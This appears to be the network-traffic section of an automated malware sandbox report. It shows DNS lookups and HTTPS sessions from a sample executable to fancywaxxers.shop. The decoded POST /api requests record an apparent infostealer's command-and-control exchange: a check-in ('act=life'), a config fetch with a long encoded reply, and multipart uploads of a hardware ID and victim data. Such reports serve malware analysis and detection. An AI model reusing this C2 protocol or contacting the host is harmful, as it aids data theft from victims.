                                                                                                        Jan 1, 2025 22:05:08.504245043 CET44349736104.21.32.1192.168.2.6
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 1, 2025 22:04:57.123034000 CET6454553192.168.2.61.1.1.1
                                                                                                        Jan 1, 2025 22:04:57.135765076 CET53645451.1.1.1192.168.2.6
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Jan 1, 2025 22:04:57.123034000 CET192.168.2.61.1.1.10x575Standard query (0)fancywaxxers.shopA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Jan 1, 2025 22:04:57.135765076 CET1.1.1.1192.168.2.60x575No error (0)fancywaxxers.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                                        Jan 1, 2025 22:04:57.135765076 CET1.1.1.1192.168.2.60x575No error (0)fancywaxxers.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                                        Jan 1, 2025 22:04:57.135765076 CET1.1.1.1192.168.2.60x575No error (0)fancywaxxers.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                                        Jan 1, 2025 22:04:57.135765076 CET1.1.1.1192.168.2.60x575No error (0)fancywaxxers.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                                        Jan 1, 2025 22:04:57.135765076 CET1.1.1.1192.168.2.60x575No error (0)fancywaxxers.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                                        Jan 1, 2025 22:04:57.135765076 CET1.1.1.1192.168.2.60x575No error (0)fancywaxxers.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                                        Jan 1, 2025 22:04:57.135765076 CET1.1.1.1192.168.2.60x575No error (0)fancywaxxers.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                                        • fancywaxxers.shop
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.649712104.21.32.14433960C:\Users\user\Desktop\UhsjR3ZFTD.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-01 21:04:57 UTC264OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 8
                                                                                                        Host: fancywaxxers.shop
                                                                                                        2025-01-01 21:04:57 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                        Data Ascii: act=life
                                                                                                        2025-01-01 21:04:58 UTC1126INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 01 Jan 2025 21:04:58 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=7c5splgj34r03uav0v9jvmvb04; expires=Sun, 27 Apr 2025 14:51:36 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FirWcVh05PZWNM0cm9sQOmiCuP7wL9InIcd5HLUw2BZqgmJoOber1Xzb%2Bi%2FBY00mKzzBVFRy6o1hau2vITzemUx9ErIqnIqFfVi1Mv02GUGYs2mbRevSXmZCYpR1fjTicaIYjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8fb576f90f234344-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1684&min_rtt=1669&rtt_var=657&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1627647&cwnd=47&unsent_bytes=0&cid=7d81c81cc2696be1&ts=549&x=0"
                                                                                                        2025-01-01 21:04:58 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        2025-01-01 21:04:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.649713104.21.32.14433960C:\Users\user\Desktop\UhsjR3ZFTD.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-01 21:04:58 UTC265OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 47
                                                                                                        Host: fancywaxxers.shop
                                                                                                        2025-01-01 21:04:58 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 76 38 36 50 47 2d 2d 55 7a 65 52 52 26 6a 3d
                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=Zv86PG--UzeRR&j=
                                                                                                        2025-01-01 21:04:59 UTC1127INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 01 Jan 2025 21:04:59 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=12ntfjilshbv6lohajqs01tv1h; expires=Sun, 27 Apr 2025 14:51:37 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w5Y44E%2Fd82MVoKPz9nLf6dmXzs25XtD6fB16i8WiYCOOMFLPAQ5xMeqE3QwA68bDN0kWhM4XJLmY6Mi2dm1PoexDqhcUakQNbzN3M5wnKX8z%2B9M60620C2116WmNoBXSKc6BIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8fb576ff49b2c327-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1603&rtt_var=612&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=1772920&cwnd=189&unsent_bytes=0&cid=e0133bb2feb49e8f&ts=482&x=0"
                                                                                                        2025-01-01 21:04:59 UTC242INData Raw: 34 39 39 34 0d 0a 6c 61 75 46 4d 42 56 45 79 4c 39 6e 4a 7a 39 62 52 38 41 78 4f 4e 68 41 42 79 76 71 63 75 47 47 30 6e 35 2f 63 54 53 6e 47 42 58 75 69 66 4d 53 4c 33 44 6b 6e 52 52 43 48 57 45 7a 73 6b 52 64 39 47 4a 6d 54 38 68 49 68 2b 65 2b 44 52 70 64 46 74 46 31 4e 36 2f 4e 35 46 78 6d 49 65 53 64 41 6c 38 64 59 52 79 37 45 31 32 32 59 6a 30 4a 6a 78 69 44 35 37 34 63 48 68 70 62 31 33 52 32 2f 63 66 69 57 48 41 6e 72 4e 34 4c 53 6c 6f 2b 49 71 46 62 56 72 45 74 62 30 62 49 58 73 50 6a 71 46 78 46 55 33 6e 43 62 48 54 59 79 76 5a 62 4e 7a 6e 6b 78 45 56 43 55 58 6c 39 34 6c 42 64 75 69 78 68 54 34 45 61 69 65 36 32 48 52 73 62 52 4d 35 2b 66 66 33 4a 34 56 6c 36 4c 72 6a 54 41 55 31 52 4f 43 69 68 45 78 54 36
                                                                                                        Data Ascii: 4994lauFMBVEyL9nJz9bR8AxONhAByvqcuGG0n5/cTSnGBXuifMSL3DknRRCHWEzskRd9GJmT8hIh+e+DRpdFtF1N6/N5FxmIeSdAl8dYRy7E122Yj0JjxiD574cHhpb13R2/cfiWHAnrN4LSlo+IqFbVrEtb0bIXsPjqFxFU3nCbHTYyvZbNznkxEVCUXl94lBduixhT4Eaie62HRsbRM5+ff3J4Vl6LrjTAU1ROCihExT6
                                                                                                        2025-01-01 21:04:59 UTC1369INData Raw: 4a 58 30 4a 30 46 44 51 31 72 4d 4e 44 41 5a 62 31 58 77 33 36 49 66 2b 45 6e 41 71 36 6f 56 46 54 56 45 33 49 4b 46 63 58 62 73 69 64 30 61 49 45 34 76 73 74 42 59 53 48 46 6e 4c 63 48 44 2f 77 4f 42 64 63 43 36 73 30 67 59 46 45 33 6b 69 75 68 4d 43 2b 67 4a 31 53 6f 73 45 6a 76 58 77 41 31 4d 4b 46 73 4a 32 4e 36 2b 4a 34 56 78 32 4b 36 72 50 44 55 35 57 50 44 65 70 57 6c 65 33 49 6d 68 44 68 78 4f 44 34 37 6f 57 45 68 6c 53 79 48 64 78 39 38 6d 6e 48 44 63 68 73 70 31 64 42 58 34 38 4e 61 56 66 54 50 67 59 4a 56 62 47 43 63 50 6a 76 46 78 46 55 31 37 41 65 58 54 38 78 75 52 61 66 44 53 71 7a 77 4e 49 57 43 73 6a 70 31 31 51 75 54 42 76 52 34 34 54 69 75 2b 35 47 52 6f 58 46 6f 73 36 63 4f 2b 4a 76 78 4a 57 4b 36 48 52 44 31 4a 64 65 54 72 73 53 68 71
                                                                                                        Data Ascii: JX0J0FDQ1rMNDAZb1Xw36If+EnAq6oVFTVE3IKFcXbsid0aIE4vstBYSHFnLcHD/wOBdcC6s0gYFE3kiuhMC+gJ1SosEjvXwA1MKFsJ2N6+J4Vx2K6rPDU5WPDepWle3ImhDhxOD47oWEhlSyHdx98mnHDchsp1dBX48NaVfTPgYJVbGCcPjvFxFU17AeXT8xuRafDSqzwNIWCsjp11QuTBvR44Tiu+5GRoXFos6cO+JvxJWK6HRD1JdeTrsShq
                                                                                                        2025-01-01 21:04:59 UTC1369INData Raw: 34 34 66 6a 75 6a 77 55 6c 30 55 54 6f 55 69 4e 39 33 4b 38 31 46 39 5a 4a 2f 65 43 30 74 61 4c 32 57 39 48 55 50 36 4a 57 6b 4a 30 46 43 4f 35 62 67 61 44 78 78 62 78 6e 52 35 2b 4d 7a 6f 57 6e 63 6d 70 39 67 42 54 6c 59 36 4b 4b 5a 42 55 4c 6f 71 59 45 69 43 47 73 4f 71 38 42 73 46 55 77 36 46 53 32 44 38 69 39 4a 52 65 53 69 74 79 30 56 61 45 79 42 6c 70 56 38 61 34 6d 4a 6f 51 59 30 56 6a 4f 57 36 45 68 67 5a 57 73 31 30 64 4f 58 47 34 31 4a 37 4c 71 44 51 43 30 46 56 4d 43 36 70 56 56 71 37 4b 43 55 48 79 42 65 62 70 4f 68 63 4b 52 52 61 79 48 55 31 77 73 72 70 58 48 41 77 36 73 4a 4c 58 42 30 2b 4b 65 49 4c 47 72 59 72 5a 55 4b 43 46 49 50 6a 76 52 6b 65 46 46 58 49 66 58 33 35 7a 75 4e 65 66 69 75 73 33 51 4a 42 57 43 73 67 71 31 39 57 2b 6d 77 6c
                                                                                                        Data Ascii: 44fjujwUl0UToUiN93K81F9ZJ/eC0taL2W9HUP6JWkJ0FCO5bgaDxxbxnR5+MzoWncmp9gBTlY6KKZBULoqYEiCGsOq8BsFUw6FS2D8i9JReSity0VaEyBlpV8a4mJoQY0VjOW6EhgZWs10dOXG41J7LqDQC0FVMC6pVVq7KCUHyBebpOhcKRRayHU1wsrpXHAw6sJLXB0+KeILGrYrZUKCFIPjvRkeFFXIfX35zuNefius3QJBWCsgq19W+mwl
                                                                                                        2025-01-01 21:04:59 UTC1369INData Raw: 33 39 38 42 73 52 55 77 36 46 63 33 37 6c 78 2b 6c 62 65 69 43 69 32 67 74 49 56 6a 38 75 70 56 52 63 74 79 70 6f 54 49 73 52 68 2b 36 69 48 78 59 5a 57 38 38 36 4f 62 66 4f 2f 78 49 76 5a 6f 33 52 4c 46 56 47 4b 7a 50 69 54 42 53 6a 59 6d 4a 46 79 45 6a 44 35 37 38 56 45 68 74 65 79 6e 56 7a 2b 63 2f 68 58 33 49 70 6f 4d 38 4e 53 31 41 79 4b 71 6c 42 57 72 63 6d 61 55 32 41 47 34 6d 6b 2f 6c 77 61 43 78 61 64 4f 6b 4c 36 78 75 64 52 59 57 61 31 6b 78 77 46 57 6a 56 6c 2b 68 4e 57 74 43 4a 71 52 59 51 62 69 2b 57 38 45 68 6f 57 58 38 31 79 5a 66 62 4e 37 31 4e 35 4b 61 76 5a 41 45 42 5a 50 69 47 6b 58 42 72 30 59 6d 4a 52 79 45 6a 44 79 35 63 70 58 7a 4a 73 68 57 55 35 37 6f 6e 67 58 6a 64 2b 36 74 45 47 53 56 55 32 49 36 74 66 55 4c 4d 70 61 55 4b 4d 48
                                                                                                        Data Ascii: 398BsRUw6Fc37lx+lbeiCi2gtIVj8upVRctypoTIsRh+6iHxYZW886ObfO/xIvZo3RLFVGKzPiTBSjYmJFyEjD578VEhteynVz+c/hX3IpoM8NS1AyKqlBWrcmaU2AG4mk/lwaCxadOkL6xudRYWa1kxwFWjVl+hNWtCJqRYQbi+W8EhoWX81yZfbN71N5KavZAEBZPiGkXBr0YmJRyEjDy5cpXzJshWU57ongXjd+6tEGSVU2I6tfULMpaUKMH
                                                                                                        2025-01-01 21:04:59 UTC1369INData Raw: 54 48 42 4a 51 31 33 31 2b 35 63 66 71 58 58 38 75 6f 39 77 42 51 46 41 2f 4b 61 68 53 58 62 51 73 62 51 6e 47 55 49 54 38 38 45 52 64 4d 6b 62 65 61 47 48 36 36 4f 70 64 4e 7a 6e 6b 78 45 56 43 55 58 6c 39 34 6c 70 49 76 69 39 33 51 49 38 65 6a 4f 65 69 48 52 41 59 52 4d 4a 31 63 2f 44 46 34 56 31 78 4a 36 2f 58 43 55 4a 59 4d 69 71 75 45 78 54 36 4a 58 30 4a 30 46 43 74 37 36 4d 4c 48 68 31 64 30 32 45 33 36 49 66 2b 45 6e 41 71 36 6f 56 46 52 6c 59 79 49 61 4a 66 57 72 34 76 5a 56 75 48 46 34 54 74 75 77 34 58 46 46 48 4f 63 6e 7a 34 7a 2f 56 65 65 54 53 76 7a 78 63 46 45 33 6b 69 75 68 4d 43 2b 68 52 69 57 5a 67 54 77 64 57 6d 48 77 73 59 57 38 6b 36 61 4c 6e 51 70 31 56 37 5a 76 4b 64 41 30 70 55 4f 69 71 6a 57 6c 61 33 4a 32 78 4d 69 52 61 48 37 72
                                                                                                        Data Ascii: THBJQ131+5cfqXX8uo9wBQFA/KahSXbQsbQnGUIT88ERdMkbeaGH66OpdNznkxEVCUXl94lpIvi93QI8ejOeiHRAYRMJ1c/DF4V1xJ6/XCUJYMiquExT6JX0J0FCt76MLHh1d02E36If+EnAq6oVFRlYyIaJfWr4vZVuHF4Ttuw4XFFHOcnz4z/VeeTSvzxcFE3kiuhMC+hRiWZgTwdWmHwsYW8k6aLnQp1V7ZvKdA0pUOiqjWla3J2xMiRaH7r
                                                                                                        2025-01-01 21:04:59 UTC1369INData Raw: 46 74 6f 30 62 72 66 4f 36 78 49 76 5a 71 6e 61 42 6b 52 58 4d 43 6d 74 56 46 36 6f 4b 47 4a 62 69 52 47 49 36 62 77 63 45 42 35 63 78 48 4e 36 2b 38 54 67 56 58 67 6a 36 70 4e 46 51 6b 56 35 66 65 4a 79 56 37 45 75 50 68 50 49 44 38 33 39 38 42 73 52 55 77 36 46 65 6e 33 79 77 2b 70 52 65 43 57 34 33 41 4e 58 58 54 51 76 73 46 6c 52 76 79 39 6f 52 49 73 57 68 65 2b 38 44 68 51 54 56 63 34 36 4f 62 66 4f 2f 78 49 76 5a 6f 6e 4b 45 30 39 61 4e 54 4f 70 55 6c 6d 73 4c 33 55 4a 78 6c 43 53 34 36 46 63 52 51 56 47 30 6e 31 6f 75 64 43 6e 56 58 74 6d 38 70 30 44 54 46 73 2b 49 36 78 42 58 37 77 74 61 6b 43 42 46 49 76 6e 73 42 67 5a 46 46 50 47 64 6e 7a 77 79 75 68 57 66 69 69 6a 30 6b 55 4c 48 54 34 39 34 67 73 61 6d 7a 6c 6d 52 59 56 51 6e 4b 71 70 58 42 6f
                                                                                                        Data Ascii: Fto0brfO6xIvZqnaBkRXMCmtVF6oKGJbiRGI6bwcEB5cxHN6+8TgVXgj6pNFQkV5feJyV7EuPhPID8398BsRUw6Fen3yw+pReCW43ANXXTQvsFlRvy9oRIsWhe+8DhQTVc46ObfO/xIvZonKE09aNTOpUlmsL3UJxlCS46FcRQVG0n1oudCnVXtm8p0DTFs+I6xBX7wtakCBFIvnsBgZFFPGdnzwyuhWfiij0kULHT494gsamzlmRYVQnKqpXBo
                                                                                                        2025-01-01 21:04:59 UTC1369INData Raw: 6a 65 76 69 63 64 5a 59 53 4f 74 79 30 64 77 58 6a 63 72 70 55 55 61 70 52 30 72 43 59 63 4b 77 37 79 4a 42 56 30 55 57 6f 55 69 4e 2b 4c 4f 35 31 56 74 4d 4b 33 52 46 45 35 51 4e 51 65 74 56 45 79 35 4c 57 5a 59 67 56 79 49 36 66 42 53 58 52 52 4f 68 53 49 33 32 4d 37 78 55 56 67 6c 75 39 52 46 43 78 30 2b 4d 2b 49 4c 47 6f 52 69 64 30 71 59 45 34 7a 31 6a 6c 78 46 43 6d 69 46 63 57 48 77 32 65 52 45 66 43 75 6d 7a 44 73 46 42 57 31 33 38 41 45 49 36 44 30 6c 56 72 64 65 77 2b 58 77 52 43 51 4b 46 74 4d 36 4c 36 57 48 70 30 41 33 66 75 71 61 42 6c 64 50 50 79 61 30 55 42 32 45 48 45 4a 66 67 68 65 54 34 36 63 54 58 56 30 57 79 6a 6f 76 7a 6f 6e 75 56 57 77 33 76 4e 41 56 51 68 30 47 61 2b 4a 4c 47 75 4a 69 55 45 71 47 48 6f 54 79 6f 56 45 36 42 56 7a 43
                                                                                                        Data Ascii: jevicdZYSOty0dwXjcrpUUapR0rCYcKw7yJBV0UWoUiN+LO51VtMK3RFE5QNQetVEy5LWZYgVyI6fBSXRROhSI32M7xUVglu9RFCx0+M+ILGoRid0qYE4z1jlxFCmiFcWHw2eREfCumzDsFBW138AEI6D0lVrdew+XwRCQKFtM6L6WHp0A3fuqaBldPPya0UB2EHEJfgheT46cTXV0WyjovzonuVWw3vNAVQh0Ga+JLGuJiUEqGHoTyoVE6BVzC
                                                                                                        2025-01-01 21:04:59 UTC1369INData Raw: 57 6e 48 44 63 7a 6f 64 45 44 53 45 68 32 4e 4c 52 51 54 4c 31 75 62 56 69 46 48 4d 50 62 2f 6c 77 46 55 77 36 46 54 33 54 35 78 2b 42 45 5a 6d 75 4b 31 67 6c 47 55 54 67 69 34 68 30 61 76 47 49 39 47 73 5a 51 68 2f 58 77 52 45 31 42 44 5a 41 70 49 4b 65 62 2b 42 78 75 5a 72 79 64 58 52 63 54 65 54 66 69 43 78 72 39 49 58 64 62 6a 68 4f 56 35 2f 63 69 49 78 4a 62 79 6a 5a 35 2f 4d 6e 67 51 6d 45 39 35 74 55 47 58 30 63 48 47 34 6c 66 58 4c 30 34 59 6b 2b 75 4d 4d 4f 71 38 42 4e 64 53 32 2b 46 4d 6a 66 49 68 36 64 4b 4e 33 37 71 36 41 5a 4c 55 7a 34 7a 73 78 35 79 6d 52 68 66 43 36 51 58 6c 71 61 45 47 77 30 43 58 63 68 32 4e 37 6d 4a 34 52 49 76 64 75 53 64 41 56 51 64 59 58 58 77 43 41 2f 70 64 54 55 62 6c 31 36 61 70 4b 5a 63 52 55 45 59 68 57 67 33 72
                                                                                                        Data Ascii: WnHDczodEDSEh2NLRQTL1ubViFHMPb/lwFUw6FT3T5x+BEZmuK1glGUTgi4h0avGI9GsZQh/XwRE1BDZApIKeb+BxuZrydXRcTeTfiCxr9IXdbjhOV5/ciIxJbyjZ5/MngQmE95tUGX0cHG4lfXL04Yk+uMMOq8BNdS2+FMjfIh6dKN37q6AZLUz4zsx5ymRhfC6QXlqaEGw0CXch2N7mJ4RIvduSdAVQdYXXwCA/pdTUbl16apKZcRUEYhWg3r
                                                                                                        2025-01-01 21:04:59 UTC1369INData Raw: 76 64 65 53 64 46 77 55 46 65 57 4b 73 58 6c 75 35 4c 47 5a 62 6d 68 61 41 38 72 4e 62 49 79 31 7a 79 48 64 79 2b 63 37 5a 62 46 59 73 75 74 41 4b 51 68 38 5a 49 72 52 51 5a 49 51 56 64 45 36 59 55 71 58 6e 70 68 39 64 58 52 62 64 4f 69 2b 33 36 4f 31 43 65 69 6d 74 6e 79 56 43 53 7a 70 6c 37 42 4e 65 2b 6e 6f 6c 62 49 55 64 68 75 71 33 58 6a 77 5a 52 73 68 31 63 4c 58 70 34 45 52 30 5a 75 53 64 43 51 55 46 65 53 53 6f 51 31 65 31 4a 53 6c 4f 6b 68 66 44 71 76 41 53 58 55 73 57 78 48 42 6e 2b 73 62 67 48 6e 45 6f 70 4a 30 61 43 30 52 35 4d 2b 49 4c 43 66 52 69 64 77 6e 51 55 4d 54 6e 6f 67 34 62 45 45 44 47 50 55 6e 4a 35 50 56 56 5a 79 58 6f 37 41 68 42 53 79 77 6d 73 6c 52 6b 68 41 39 33 54 70 67 54 77 64 57 6d 48 78 30 64 55 59 55 30 4e 2b 2b 4a 76 78
                                                                                                        Data Ascii: vdeSdFwUFeWKsXlu5LGZbmhaA8rNbIy1zyHdy+c7ZbFYsutAKQh8ZIrRQZIQVdE6YUqXnph9dXRbdOi+36O1CeimtnyVCSzpl7BNe+nolbIUdhuq3XjwZRsh1cLXp4ER0ZuSdCQUFeSSoQ1e1JSlOkhfDqvASXUsWxHBn+sbgHnEopJ0aC0R5M+ILCfRidwnQUMTnog4bEEDGPUnJ5PVVZyXo7AhBSywmslRkhA93TpgTwdWmHx0dUYU0N++Jvx


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.649714104.21.32.14433960C:\Users\user\Desktop\UhsjR3ZFTD.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-01 21:04:59 UTC280OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=XTEVJ4K09XD5XLU
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 12841
                                                                                                        Host: fancywaxxers.shop
                                                                                                        2025-01-01 21:04:59 UTC12841OUTData Raw: 2d 2d 58 54 45 56 4a 34 4b 30 39 58 44 35 58 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 45 43 39 38 46 35 46 43 44 34 46 39 43 42 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 58 54 45 56 4a 34 4b 30 39 58 44 35 58 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 54 45 56 4a 34 4b 30 39 58 44 35 58 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 76 38 36 50 47 2d 2d 55 7a 65 52 52 0d 0a 2d 2d 58 54 45 56 4a
                                                                                                        Data Ascii: --XTEVJ4K09XD5XLUContent-Disposition: form-data; name="hwid"6EEC98F5FCD4F9CB20A4C476FD51BCB1--XTEVJ4K09XD5XLUContent-Disposition: form-data; name="pid"2--XTEVJ4K09XD5XLUContent-Disposition: form-data; name="lid"Zv86PG--UzeRR--XTEVJ
                                                                                                        2025-01-01 21:05:00 UTC1134INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 01 Jan 2025 21:05:00 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=0clg2ssvi9rcgp8ho8cjov002t; expires=Sun, 27 Apr 2025 14:51:39 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=omaI%2FyQ7gdwilJl9oGyi9%2BILF0z2hz92ZjM0BNsEsuKszdyuT%2B0y%2FAQftWefnIe0F6L0tH4Y6f2HecZ4mzryghNoPj6J9RC6qkbiI4SwvU95QFEuj5gg3kCVP7oGqbpmOENgXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8fb57706fc351875-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2103&min_rtt=2092&rtt_var=807&sent=7&recv=17&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13779&delivery_rate=1337608&cwnd=153&unsent_bytes=0&cid=01db28871cbfd54a&ts=576&x=0"
                                                                                                        2025-01-01 21:05:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2025-01-01 21:05:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.649715104.21.32.14433960C:\Users\user\Desktop\UhsjR3ZFTD.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-01 21:05:01 UTC280OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SJ9KEQ9EX23R4F2
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 15087
                                                                                                        Host: fancywaxxers.shop
                                                                                                        2025-01-01 21:05:01 UTC15087OUTData Raw: 2d 2d 53 4a 39 4b 45 51 39 45 58 32 33 52 34 46 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 45 43 39 38 46 35 46 43 44 34 46 39 43 42 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 53 4a 39 4b 45 51 39 45 58 32 33 52 34 46 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 4a 39 4b 45 51 39 45 58 32 33 52 34 46 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 76 38 36 50 47 2d 2d 55 7a 65 52 52 0d 0a 2d 2d 53 4a 39 4b 45
                                                                                                        Data Ascii: --SJ9KEQ9EX23R4F2Content-Disposition: form-data; name="hwid"6EEC98F5FCD4F9CB20A4C476FD51BCB1--SJ9KEQ9EX23R4F2Content-Disposition: form-data; name="pid"2--SJ9KEQ9EX23R4F2Content-Disposition: form-data; name="lid"Zv86PG--UzeRR--SJ9KE
                                                                                                        2025-01-01 21:05:01 UTC1139INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 01 Jan 2025 21:05:01 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=m8a8t9na5kfr9b7a649ati7otj; expires=Sun, 27 Apr 2025 14:51:40 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
